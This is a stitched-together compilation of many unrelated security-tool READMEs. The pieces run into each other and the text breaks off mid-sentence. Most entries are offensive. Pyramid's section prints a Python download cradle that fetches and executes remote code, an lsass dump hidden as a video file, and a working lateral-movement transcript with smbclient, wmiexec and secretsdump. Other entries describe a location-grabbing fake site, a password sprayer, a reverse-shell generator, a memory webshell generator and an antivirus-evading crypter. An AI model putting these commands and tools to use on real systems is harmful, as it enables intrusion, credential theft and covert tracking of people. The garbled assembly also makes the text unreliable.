This tool was created to demostrate a bypass strategy against EDRs based on some blind-spots assumptions. It is a combination of already existing techniques and tools in a (to the best of my knowledge) novel way that can help evade defenses. The sole intent of the tool is to help the community increasing awareness around this kind of usage and accelerate a resolution. It' not a 0day, it's not a full fledged shiny C2, Pyramid exploits what might be EDRs blind spots and the tool has been made public to shed some light on them. A defense paragraph has been included, hoping that experienced blue-teamers can help contribute and provide better possible resolution on the issue Pyramid aims to highlight. All information is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.
Pyramid is using some awesome tools made by:
TrustedSec for COFFLoader
snovvcrash - base-DonPAPI.py - base-LaZagne.py - base-clr.py
Pyramid capabilities are executed directly from python.exe process and are currently:
Pyramid is meant to be used unpacking an official embeddable Python package and then running python.exe to execute a Python download cradle. This is a simple way to avoid creating uncommon Process tree pattern and looking like a normal Python application usage.
In Pyramid the download cradle is used to reach a Pyramid Server (simple HTTPS server with auth) to fetch base scripts and dependencies.
Base scripts are specific for the feature you want to use and contain:
BOFs are ran through a base script containing the shellcode resulted from bof2shellcode and the related in-process injection code.
The Python dependencies have been already fixed and modified to be imported in memory without conflicting.
There are currently 8 main base scripts available:
git clone https://github.com/naksyn/Pyramid
Generate SSL certificates for HTTP Server:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
Example of running Pyramid HTTP Server using SSL certificate and by providing Basic Authentication:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/user/SSL/key.pem /home/user/SSL/cert.pem /home/user/Pyramid/Server/
Insert AD details and HTTPS credentials in the upper part of the script.
Insert AD details and HTTPS credentials in the upper part of the script.
The nanodump BOF has been modified stripping Beacon API calls, cmd line parsing and hardcoding input arguments in order to use the process forking technique and outputting lsass dump to C:\Users\Public\video.avi. To change these settings modify nanodump source file entry.c accordingly and recompile the BOF. Then use the tool bof2shellcode giving as input the compiled nanodump BOF:
python3 bof2shellcode.py -i /home/user/bofs/nanodump.x64.o -o nanodump.x64.bin
You can transform the resulting shellcode to python format using msfvenom:
msfvenom -p generic/custom PAYLOADFILE=nanodump.x64.bin -f python > sc_nanodump.txt
Then paste it into the base script within the shellcode variable.
Insert SSH server, local port forward details details and HTTPS credentials in the upper part of the script and modify the sc variable using your preferred shellcode stager. Remember to tunnel your traffic using SSH local port forward, so the stager should have 127.0.0.1 as C2 server and the SSH listening port as the C2 port.
Insert AD details and HTTPS credentials in the upper part of the script.
Insert HTTPS credentials in the upper part of the script and change lazagne module if needed.
Insert HTTPS credentials in the upper part of the script and assembly bytes of the file you want to load.
Insert parameters in the upper part of the script.
Once the Pyramid server is running and the Base script is ready you can execute the download cradle from python.exe. A Python download cradle can be as simple as:
import urllib.request
import base64
import ssl
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
gcontext.check_hostname = False
gcontext.verify_mode = ssl.CERT_NONE
request = urllib.request.Request('https://myIP/base-bof.py')
base64string = base64.b64encode(bytes('%s:%s' % ('testuser', 'Sup3rP4ss!'),'ascii'))
request.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
result = urllib.request.urlopen(request, context=gcontext)
payload = result.read()
exec(payload)
Bear in mind that urllib is an Embeddable Package native Python module, so you don't need to install additional dependencies for this cradle. The downloaded python "base" script will in-memory import the dependencies and execute its capabilites within the python.exe process.
To execute Pyramid without bringing up a visible python.exe prompt you can leverage pythonw.exe that won't open a console window upon execution and is contained in the very same Windows Embeddable Package. The following picture illustrate an example usage of pythonw.exe to execute base-tunnel-socks5.py on a remote machine without opening a python.exe console window.
The attack transcript is reported below:
Start Pyramid Server:
python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/
Save the base download cradle to cradle.py.
Copy unpacked windows Embeddable Package (with cradle.py) to target:
smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd Users\Public; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'
Execute pythonw.exe to launch the cradle:
/usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1\!"@192.168.1.11 'C:\Users\Public\python-3.10.4-embed-amd64\pythonw.exe C:\Users\Public\python-3.10.4-embed-amd64\cradle.py'
Socks5 server is running on target and SSH tunnel should be up, so modify proxychains.conf and tunnel traffic through target:
proxychains impacket-secretsdump domain/user:"Password1\!"@192.168.1.50 -just-dc
Dynamically loading Python modules does not natively support importing *.pyd files that are essentially dlls. The only public solution to my knowledge that solves this problem is provided by Scythe *(in-memory-execution) by re-engineering the CPython interpreter. In ordrer not to lose the digital signature, one solution that would allow using the native Python embeddable package involves dropping on disk the required pyd files or wheels. This should not have significant OPSEC implications in most cases, however bear in mind that the following wheels containing pyd files are dropped on disk to allow Dinamic loading to complete: *. Cryptodome - needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne *. bcrypt, cryptography, nacl, cffi - needed by paramiko
Python.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code. Pyramid exploits these evasion properties carrying out offensive tasks from within the same python.exe process.
For this reason, one of the most efficient solution would be to block by default binaries and dlls signed by Python Foundation, creating exceptions only for users that actually need to use python binaries.
Alerts on downloads of embeddable packages can also be raised.
Deploying PEP-578 is also feasible although complex, this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock python binaries could make this countermeasure useless.
AzureGraph is an Azure AD information gathering tool over Microsoft Graph.
Thanks to Microsoft Graph technology, it is possible to obtain all kinds of information from Azure AD, such as users, devices, applications, domains and much more.
This application, allows you to query this data through the API in an easy and simple way through a PowerShell console. Additionally, you can download all the information from the cloud and use it completely offline.
It's recommended to clone the complete repository or download the zip file.
You can do this by running the following command:
git clone https://github.com/JoelGMSec/AzureGraph
.\AzureGraph.ps1 -h
_ ____ _
/ \ _____ _ _ __ ___ / ___|_ __ __ _ _ __ | |__
/ _ \ |_ / | | | '__/ _ \ | _| '__/ _' | '_ \| '_ \
/ ___ \ / /| |_| | | | __/ |_| | | | (_| | |_) | | | |
/_/ \_\/___|\__,_|_| \___|\____|_| \__,_| .__/|_| |_|
|_|
-------------------- by @JoelGMSec --------------------
Info: This tool helps you to obtain information from Azure AD
like Users or Devices, using de Microsft Graph REST API
Usage: .\AzureGraph.ps1 -h
Show this help, more info on my blog: darkbyte.net
.\AzureGraph.ps1
Execute AzureGraph in fully interactive mode
Warning: You need previously generated MS Graph token to use it
You can use a refresh token too, or generate a new one
https://darkbyte.net/azuregraph-enumerando-azure-ad-desde-microsoft-graph
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
This tool has been created and designed from scratch by Joel Gรกmez Molina // @JoelGMSec
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
The tool hosts a fake website which uses an iframe to display a legit website and, if the target allows it, it will fetch the Gps location (latitude and longitude)
of the target along with IP Address
and Device Information
.
Using this tool, you can find out what information a malicious website can gather about you and your devices and why you shouldn't click on random links or grant permissions like Location to them.
+ it wil automatically fetch ip address and device information
! if location permission allowed, it will fetch exact location of target.
- It will not work on laptops or phones that have broken GPS,
# browsers that block javascript,
# or if the user is mocking the GPS location.
- Geographic location based on IP address is NOT accurate,
# Does not provide the location of the target.
# Instead, it provides the approximate location of the ISP (Internet service provider)
+ GPS fetch almost exact location because it uses longitude and latitude coordinates.
@@ Once location permission is granted @@
# accurate location information is recieved to within 20 to 30 meters of the user's location.
# (it's almost exact location)
git clone https://github.com/spyboy-productions/r4ven.git
cd r4ven
pip3 install -r requirements.txt
python3 r4ven.py
enter your discord webhook url (set up a channel in your discord server with webhook integration)
https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
if not have discord account and sever make one, it's free.
index.html
on line 12 and replace the src
in the iframe. (Note: not every website support iframe)With this application, it is aimed to accelerate the incident response processes by collecting information in linux operating systems.
Information is collected in the following contents.
/etc/passwd
cat /etc/group
cat /etc/sudoers
lastlog
cat /var/log/auth.log
uptime/proc/meminfo
ps aux
/etc/resolv.conf
/etc/hosts
iptables -L -v -n
find / -type f -size +512k -exec ls -lh {}/;
find / -mtime -1 -ls
ip a
netstat -nap
arp -a
echo $PATH
git clone https://github.com/anil-yelken/pylirt
cd pylirt
sudo pip3 install paramiko
The following information should be specified in the cred_list.txt file:
IP|Username|Password
sudo python3 plirt.py
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
The Klyda project has been created to aid in quick credential based attacks against online web applications.
Klyda supports the use from simple password sprays, to large multithreaded dictionary attacks.
Klyda is a new project, and I am looking for any contributions. Any help is very appreciated.
Klyda offers simple, easy to remember usage; however, still offers configurability for your needs:
1) Clone the Git repo to your machine, git clone https://github.com/Xeonrx/Klyda
2) Cd into the Klyda directory, cd Klyda
3) Install the neccessary modules via Pip, pip install requests beautifulsoup4 colorama numpy
4) Display the Klyda help prompt for usage, python3 klyda.py -h
Klyda has been mainly designed for Linux, but should work on any machine capable of running Python.
What Klyda needs to work are only four simple dependencies: URL to attack, username(s), password(s), and formdata.
You can parse the URL via the --url
tag. It should look something like this, --url http://127.0.0.1
Remember to never launch an attack on a webpage, that you don't have proper permission to do so.
Usernames are the main target to these dictionary attacks. It could be a whole range of usernames, a few in specific, or perhaps just one. That's all your decision when using the script. You can specify usernames in a few ways...
1) Specify them manually, -u Admin User123 Guest
2) Give a file to use, or a few to combine, -U users.txt extra.txt
3) Give both a file & manual entry, -U users.txt -u Johnson924
Passwords are the hard part to these attacks. You don't know them, hence why dictionary & brute force attacks exists. Like the usernames, you can give from just one password, up to however many you want. You can specify passwords in a few ways...
1) Specify them manually, -p password 1234 letmein
2) Give a file to use, or a few to combine, -P passwords.txt extra.txt
3) Give both a file & manual entry, -P passwords.txt -p redklyda24
FormData is how you form the request, so the target website can take it in, and process the given information. Usually you would need to specify a: username value, a password value, and sometimes an extra value. You can see the FormData your target uses by reviewing the network tab, of your browsers inspect element. For Klyda, you use the -d
tag.
You need to use placeholders to Klyda knows where to inject in the username & password, when fowarding out its requests. It may look something like this... -d username:xuser password:xpass Login:Login
xuser
is the placeholder to inject the usernames, & xpass
is the placeholder to inject the passwords. Make sure you know these, or Klyda won't be able to work.
Format the FormData as (key):(value)
In order to Klyda to know if it hit a successful strike or not, you need to give it data to dig through. Klyda takes use of given blacklists from failed login attempts, so it can tell the difference between a failed or complete request. You can blacklist three different types of data...
1) Strings, --bstr "Login failed"
2) Status Codes, --bcde 404
3) Content Length, --blen 11
You can specify as much data for each blacklist as needed. If any of the given data is not found from the response, Klyda gives it a "strike", saying it was a successful login attempt. Otherwise if data in the blacklists is found, Klyda marks it as an unsuccessful login attempt. Since you give the data for Klyda to evaluate, false positives are non-apparent.
If you don't give any data to blacklist, then every request will be marked as a strike from Klyda!
By default, Klyda only uses a single thread to run; but, you can specify more, using the -t
tag. This can be helpful for speeding up your work.
However, credential attacks can be very loud on a network; hence, are detected easily. A targeted account could simply just receieve a simple lock due to too many login attempts. This creates a DoS attack, but prevents you from gaining the users's credentials, which is the goal of Klyda.
So to make these attacks a little less loud, you can take use of the --rate
tag. This allows you to limit your threads to a certain number of requests per minute.
It will be formatted like this, --rate (# of requests) (minutes)
For example, --rate 5 1
will only send out 5 requests for each minute. Remember, this is for each thread. If you had 2 threads, this would send 10 requests per minute.
Test Klyda out on the Damn Vulnerable Web App (DVWA), or Mutillidae.
python3 klyda.py --url http://127.0.0.1/dvwa/login.php -u user guest admin -p 1234 password admin -d username:xuser password:xpass Login:Login --bstr "Login failed"
python3 klyda.py --url http://127.0.0.1/mutillidae/index.php?page=login.php -u root -P passwords.txt -d username:xuser password:xpass login-php-submit-button:Login --bstr "Authentication Error"
Like mentioned earlier, Klyda is still a work in progress. For the future, I plan on adding more functionality and reformating code for a cleaner look.
My top piority is to add proxy functionality, and am currently working on it.
scscanner is tool to read website status code response from the lists. This tool have ability to filter only spesific status code, and save the result to a file.
โโโ(mikuใฟnakano)-[~/scscanner]
โโ$ bash scscanner.sh
scscanner - Massive Status Code Scanner
Codename : EVA02
Example: bash scscanner.sh -l domain.txt -t 30
options:
-l Files contain lists of domain.
-t Adjust multi process. Default is 15
-f Filter status code.
-o Save to file.
-h Print this Help.
Adjust multi-process
bash scscanner.sh -l domain.txt -t 30
Using status code filter
bash scscanner.sh -l domain.txt -f 200
Using status code filter and save to file.
bash scscanner.sh -l domain.txt -f 200 -o result.txt
Feel free to contribute if you want to improve this tools.
Neton is a tool for getting information from Internet connected sandboxes. It is composed by an agent and a web interface that displays the collected information.
The Neton agent gets information from the systems on which it runs and exfiltrates it via HTTPS to the web server.
Some of the information it collects:
All this information can be used to improve Red Team artifacts or to learn how sandboxes work and improve them.
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 manage.py migrate
python3 manage.py makemigrations core
python3 manage.py migrate core
python3 manage.py createsuperuser
python3 manage.py runserver
openssl req -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout server.key -out server.crt
Launch gunicorn:
./launch_prod.sh
Build solution with Visual Studio. The agent configuration can be done from the Program.cs class.
In the sample data folder there is a sqlite database with several samples collected from the following services:
To access the sample information copy the sqlite file to the NetonWeb folder and run the application.
Credentials:
raccoon
jAmb.Abj3.j11pmMa
A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
git clone https://github.com/4ndr34z/shells
cd shells
./install.sh
With this application, it is aimed to accelerate the incident response processes by collecting information in windows operating systems via winrm.
Information is collected in the following contents.
IP Configuration
Users
Groups
Tasks
Services
Task Scheduler
Registry Control
Active TCP & UDP ports
File sharing
Files
Firewall Config
Sessions with other Systems
Open Sessions
Log Entries
git clone https://github.com/anil-yelken/pywirt
cd pywirt
pip3 install pywinrm
The following information should be specified in the cred_list.txt file:
IP|Username|Password
https://twitter.com/anilyelken06
https://medium.com/@anilyelken
Abusing SecurityTrails domain suggestion API to find potentially related domains by keyword and brute force.
Use it while it still works
(Also, hmu on Mastodon: @n0kovo@infosec.exchange)
usage: domaindouche.py [-h] [-n N] -c COOKIE -a USER_AGENT [-w NUM] [-o OUTFILE] keyword
Abuses SecurityTrails API to find related domains by keyword.
Go to https://securitytrails.com/dns-trails, solve any CAPTCHA you might encounter,
copy the raw value of your Cookie and User-Agent headers and use them with the -c and -a arguments.
positional arguments:
keyword keyword to append brute force string to
options:
-h, --help show this help message and exit
-n N, --num N number of characters to brute force (default: 2)
-c COOKIE, --cookie COOKIE
raw cookie string
-a USER_AGENT, --useragent USER_AGENT
user-agent string (must match the browser where the cookies are from)
-w NUM, --workers NUM
number of workers (default: 5)
-o OUTFILE, --output OUTFILE
output file path
D4TA-HUNTER is a tool created in order to automate the collection of information about the employees of a company that is going to be audited for ethical hacking.
In addition, in this tool we can find in the "search company" section by inserting the domain of a company, emails of employees, subdomains and IP's of servers.
Register on https://rapidapi.com/rohan-patra/api/breachdirectory
git clone https://github.com/micro-joan/D4TA-HUNTER
cd D4TA-HUNTER/
chmod +x run.sh
./run.sh
After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:
First you must have a free or paid api-key from BreachDirectory.org, if you don't have one and do a search D4TA-HUNTER provides you with a guide on how to get one.
Once you have the api-key you will be able to search for emails, with the advantage of showing you a list of all the password hashes ready for you to copy and paste into one of the online resources provided by D4TA-HUNTER to crack passwords 100 % free.
ย
You can also insert a domain of a company and D4TA-HUNTER will search for employee emails, subdomains that may be of interest together with IP's of machines found:
ย
Service | Functions | Status |
---|---|---|
BreachDirectory.org | Email, phone or nick leaks |
โ
๏ (free plan) |
TheHarvester | Domains and emails of company |
โ
Free |
Kalitorify | Tor search |
โ
Free |
Video Demo:ย https://darkhacking.es/d4ta-hunter-framework-osint-para-kali-linux
My website:ย https://microjoan.com
My blog:ย https://darkhacking.es/
Buy me a coffee:ย https://www.buymeacoffee.com/microjoan
Thisย toolkitย contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.
This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products
*:- For Windows: https://www.python.org/ftp/python/3.10.7/python-3.10.7-amd64.exe
*:- For Linux:
*:- For Windows:-
*:- For Linux:-
Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act.
A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons:
Example #1: Running a regex that essentially matches strings similar to: password = something
against /var/www
Example #2: Using comma separated keywords instead of regex:
Disclaimer: Only tested on Windows 10 Pro.Notable features:
-x
search actually returns a unique list of all matched patterns in a file. Be careful when combining it with -v
(--verbose), try to be specific and limit the length of chars to match.-b
.-k
and regex -x
values. This is useful in case you have gained a limited shell on a machine and want to have "tree" with colored output to look around.filetype_blacklist
in eviltree.py
which can be used to exclude certain file extensions from content search. By default, it excludes the following: gz, zip, tar, rar, 7z, bz2, xz, deb, img, iso, vmdk, dll, ovf, ova
.-i
(--interesting-only) option. It instructs eviltree to list only files with matching keywords/regex content, significantly reducing the output length:-x ".{0,3}passw.{0,3}[=]{1}.{0,18}"
-k passw,db_,admin,account,user,token
ย
KubeEye is an inspection tool for Kubernetes to discover Kubernetes resources (by OPA ), cluster components, cluster nodes (by Node-Problem-Detector) and other configurations are meeting with best practices, and giving suggestions for modification.
KubeEye supports custom inspection rules and plugins installation. Through KubeEye Operator, you can view the inspection results and modification suggestions by the graphical display on the web page.
KubeEye get cluster resource details by the Kubernetes API, inspect the resource configurations by inspection rules and plugins, and generate inspection results. See Architecture for details.
Install KubeEye on your machine
Download pre built executables from Releases.
Or you can build from source code
Note: make install will create kubeeye in /usr/local/bin/ on your machine.
git clone https://github.com/kubesphere/kubeeye.git
cd kubeeye
make installke
[Optional] Install Node-problem-Detector
Note: This will install npd on your cluster, only required if you want detailed report.
kubeeye install npd
Note: The results of kubeeye sort by resource kind.
kubeeye audit
KIND NAMESPACE NAME REASON LEVEL MESSAGE
Node docker-desktop kubelet has no sufficient memory available warning KubeletHasNoSufficientMemory
Node docker-desktop kubelet has no sufficient PID available warning KubeletHasNoSufficientPID
Node docker-desktop kubelet has disk pressure warning KubeletHasDiskPressure
Deployment default testkubeeye NoCPULimits
Deployment default testkubeeye NoReadinessProbe
Deployment default testkubeeye NotRunAsNonRoot
Deployment kube-system coredns NoCPULimits
Deployment kube-system coredns ImagePullPolicyNotAlways
Deployment kube-system coredns NotRunAsNonRoot
Deployment kubeeye-system kubeeye-controller-manager ImagePullPolicyNotAlways
Deployment kubeeye-system kubeeye-controller-manager NotRunAsNonRoot
DaemonSet kube-system kube-proxy NoCPULimits
DaemonSet k ube-system kube-proxy NotRunAsNonRoot
Event kube-system coredns-558bd4d5db-c26j8.16d5fa3ddf56675f Unhealthy warning Readiness probe failed: Get "http://10.1.0.87:8181/ready": dial tcp 10.1.0.87:8181: connect: connection refused
Event kube-system coredns-558bd4d5db-c26j8.16d5fa3fbdc834c9 Unhealthy warning Readiness probe failed: HTTP probe failed with statuscode: 503
Event kube-system vpnkit-controller.16d5ac2b2b4fa1eb BackOff warning Back-off restarting failed container
Event kube-system vpnkit-controller.16d5fa44d0502641 BackOff warning Back-off restarting failed container
Event kubeeye-system kubeeye-controller-manager-7f79c4ccc8-f2njw.16d5fa3f5fc3229c Failed warning Failed to pull image "controller:latest": rpc error: code = Unknown desc = Error response from daemon: pull access denied for controller, repository does not exist or may require 'docker login': denied: requested access to the resource is denied
Event kubeeye-system kubeeye-controller-manager-7f79c4ccc8-f2njw.16d5fa3f61b28527 Failed warning Error: ImagePullBackOff
Role kubeeye-system kubeeye-leader-election-role CanDeleteResources
ClusterRole kubeeye-manager-role CanDeleteResources
ClusterRole kubeeye-manager-role CanModifyWorkloads
ClusterRole vpnkit-controller CanImpersonateUser
ClusterRole vpnkit-controller CanDeleteResources
YES/NO | CHECK ITEM | Description | Level |
---|---|---|---|
โ
|
PrivilegeEscalationAllowed | Privilege escalation is allowed | danger |
โ
|
CanImpersonateUser | The role/clusterrole can impersonate other user | warning |
โ
|
CanModifyResources | The role/clusterrole can delete kubernetes resources | warning |
โ
|
CanModifyWorkloads | The role/clusterrole can modify kubernetes workloads | warning |
โ
|
NoCPULimits | The resource does not set limits of CPU in containers.resources | danger |
โ
|
NoCPURequests | The resource does not set requests of CPU in containers.resources | danger |
โ
|
HighRiskCapabilities | Have high-Risk options in capabilities such as ALL/SYS_ADMIN/NET_ADMIN | danger |
โ
|
HostIPCAllowed | HostIPC Set to true | danger |
โ
|
HostNetworkAllowed | HostNetwork Set to true | danger |
โ
|
HostPIDAllowed | HostPID Set to true | danger |
โ
|
HostPortAllowed | HostPort Set to true | danger |
โ
|
ImagePullPolicyNotAlways | Image pull policy not always | warning |
โ
|
ImageTagIsLatest | The image tag is latest | warning |
โ
|
ImageTagMiss | The image tag do not declare | danger |
โ
|
InsecureCapabilities | Have insecure options in capabilities such as KILL/SYS_CHROOT/CHOWN | danger |
โ
|
NoLivenessProbe | The resource does not set livenessProbe | warning |
โ
|
NoMemoryLimits | The resource does not set limits of memory in containers.resources | danger |
โ
|
NoMemoryRequests | The resource does not set requests of memory in containers.resources | danger |
โ
|
NoPriorityClassName | The resource does not set priorityClassName | ignore |
โ
|
PrivilegedAllowed | Running a pod in a privileged mode means that the pod can access the hostโs resources and kernel capabilities | danger |
โ
|
NoReadinessProbe | The resource does not set readinessProbe | warning |
โ
|
NotReadOnlyRootFilesystem | The resource does not set readOnlyRootFilesystem to true | warning |
โ
|
NotRunAsNonRoot | The resource does not set runAsNonRoot to true, maybe executed run as a root account | warning |
โ
|
CertificateExpiredPeriod | Certificate expiration date less than 30 days | danger |
โ
|
EventAudit | Event audit | warning |
โ
|
NodeStatus | node status audit | warning |
โ
|
DockerStatus | docker status audit | warning |
โ
|
KubeletStatus | kubelet status audit | warning |
mkdir opa
Note: the OPA rule for workloads, package name must be kubeeye_workloads_regofor RBAC, package name must be kubeeye_RBAC_regofor nodes, package name must be kubeeye_nodes_rego
package kubeeye_workloads_rego
deny[msg] {
resource := input
type := resource.Object.kind
resourcename := resource.Object.metadata.name
resourcenamespace := resource.Object.metadata.namespace
workloadsType := {"Deployment","ReplicaSet","DaemonSet","StatefulSet","Job"}
workloadsType[type]
not workloadsImageRegistryRule(resource)
msg := {
"Name": sprintf("%v", [resourcename]),
"Namespace": sprintf("%v", [resourcenamespace]),
"Type": sprintf("%v", [type]),
"Message": "ImageRegistryNotmyregistry"
}
}
workloadsImageRegistryRule(resource) {
regex.match("^myregistry.public.kubesphere/basic/.+", resource.Object.spec.template.spec.containers[_].image)
}
Note: Specify the path then Kubeeye will read all files in the directory that end with .rego.
root:# kubeeye audit -p ./opa
NAMESPACE NAME KIND MESSAGE
default nginx1 Deployment [ImageRegistryNotmyregistry NotReadOnlyRootFilesystem NotRunAsNonRoot]
default nginx11 Deployment [ImageRegistryNotmyregistry PrivilegeEscalationAllowed HighRiskCapabilities HostIPCAllowed HostPortAllowed ImagePullPolicyNotAlways ImageTagIsLatest InsecureCapabilities NoPriorityClassName PrivilegedAllowed NotReadOnlyRootFilesystem NotRunAsNonRoot]
default nginx111 Deployment [ImageRegistryNotmyregistry NoCPULimits NoCPURequests ImageTagMiss NoLivenessProbe NoMemoryLimits NoMemoryRequests NoPriorityClassName NotReadOnlyRootFilesystem NoReadinessProbe NotRunAsNonRoot]
kubectl edit ConfigMap node-problem-detector-config -n kube-system
kubectl rollout restart DaemonSet node-problem-detector -n kube-system
KubeEye Operator is an inspection platform for Kubernetes, manage KubeEye by operator and generate inspection result.
kubectl apply -f https://raw.githubusercontent.com/kubesphere/kubeeye/main/deploy/kubeeye.yaml
kubectl apply -f https://raw.githubusercontent.com/kubesphere/kubeeye/main/deploy/kubeeye_insights.yaml
kubectl get clusterinsight -o yaml
apiVersion: v1
items:
- apiVersion: kubeeye.kubesphere.io/v1alpha1
kind: ClusterInsight
metadata:
name: clusterinsight-sample
namespace: default
spec:
auditPeriod: 24h
status:
auditResults:
auditResults:
- resourcesType: Node
resultInfos:
- namespace: ""
resourceInfos:
- items:
- level: warning
message: KubeletHasNoSufficientMemory
reason: kubelet has no sufficient memory available
- level: warning
message: KubeletHasNoSufficientPID
reason: kubelet has no sufficient PID available
- level: warning
message: KubeletHasDiskPressure
reason: kubelet has disk pressure
name: kubeeyeNode
Msmap is a Memory WebShell Generator. Compatible with various Containers, Components, Encoder, WebShell / Proxy / Killer and Management Clients. ็ฎไฝไธญๆ
The idea behind I, The idea behind II
*: Default support for Linux Tomcat 8/9
, more versions can be adapted according to the advanced guide.
WebShell
No need for modularity
Proxy: Neo-reGeorg, wsproxy
Killer: java-memshell-scanner, ASP.NET-Memshell-Scanner
git clone git@github.com:hosch3n/msmap.git
cd msmap
python generator.py
[Warning] MUST set a unique password, Options are case sensitive.
Edit config/environment.py
# Auto Compile
auto_build = True
# Base64 Encode Class File
b64_class = True
# Generate Script File
generate_script = True
# Compiler Absolute Path
java_compiler_path = r"~/jdk1.6.0_04/bin/javac"
dotnet_compiler_path = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"
Edit gist/java/container/tomcat/servlet.py
// Servlet Path Pattern
private static String pattern = "*.xml";
If an encryption encoder is used in WsFilter, the password needs to be the same as the path (eg /passwd
)
gist/java/container/jdk/javax.py
with lib/servlet-api.jar
can be replaced depending on the target container.
pip3 install pyperclip
to support automatic copying to clipboard.
Command with Base64 Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve Base64 CMD passwd
Type JSP with default Encoder | Inject Tomcat Valve
python generator.py Java Tomcat Valve RAW AntSword passwd
Type JSP with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat Listener
python generator.py Java Tomcat Listener AES128 AntSword passwd
Type JSP with rc_4_sha256 Encoder | Inject Tomcat Servlet
python generator.py Java Tomcat Servlet RC4 AntSword passwd
Type JSP with xor_md5 Encoder | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX XOR AntSword passwd
Type JSPJS with aes_128_ecb_pkcs7_padding_md5 Encoder | Inject Tomcat WsFilter
python generator.py Java Tomcat WsFilter AES128 JSPJS passwd
Type default_aes | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Behinder rebeyond
Type default_xor_base64 | Inject Spring Interceptor
python generator.py Java Spring Interceptor XOR Behinder rebeyond
Type JAVA_AES_BASE64 | Inject Tomcat Valve
python generator.py Java Tomcat Valve AES128 Godzilla superidol
Type JAVA_AES_BASE64 | AgentFiless Inject HttpServlet
python generator.py Java JDK JavaX AES128 Godzilla superidol
Behinder | wsMemShell | ysomap
SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.
SharpSCCM was initially created to execute user hunting and lateral movement functions ported from PowerSCCM (by @harmj0y, @jaredcatkinson, @enigma0x3, and @mattifestation) and now contains additional functionality to gather credentials and abuse newly discovered attack primitives for coercing NTLM authentication in SCCM sites where automatic site-wide client push installation is enabled.
Please visit the wiki for documentation detailing how to build and use SharpSCCM.
Chris Thompson is the primary author of this project. Duane Michael (@subat0mik) and Evan McBroom (@mcbroom_evan) are active contributors as well. Please feel free to reach out on Twitter (@_Mayyhem) with questions, ideas for improvements, etc., and on GitHub with issues and pull requests.
This tool was written as a proof of concept in a lab environment and has not been thoroughly tested. There are lots of unfinished bits, terrible error handling, and functions I may never complete. Please be careful and use at your own risk.
Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.
Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:
The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.
A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:
Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.
Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.
Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.
Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.
As a final verification method, images are scanned for certain strings to verify the accuracy of the model.
The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.
To train the model, data can also be fed into the model_generator.py
script, and the newly improved h5 file can be used.
pip install -r requirements.txt
.sudo apt install tesseract-ocr -y
(for Ubuntu/Debian).python3 octopii.py <location name>
, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>
Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.
Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:
Fork the official repository at https://github.com/redhuntlabs/octopii
There are 3 files in the models/
directory. - The keras_models.h5
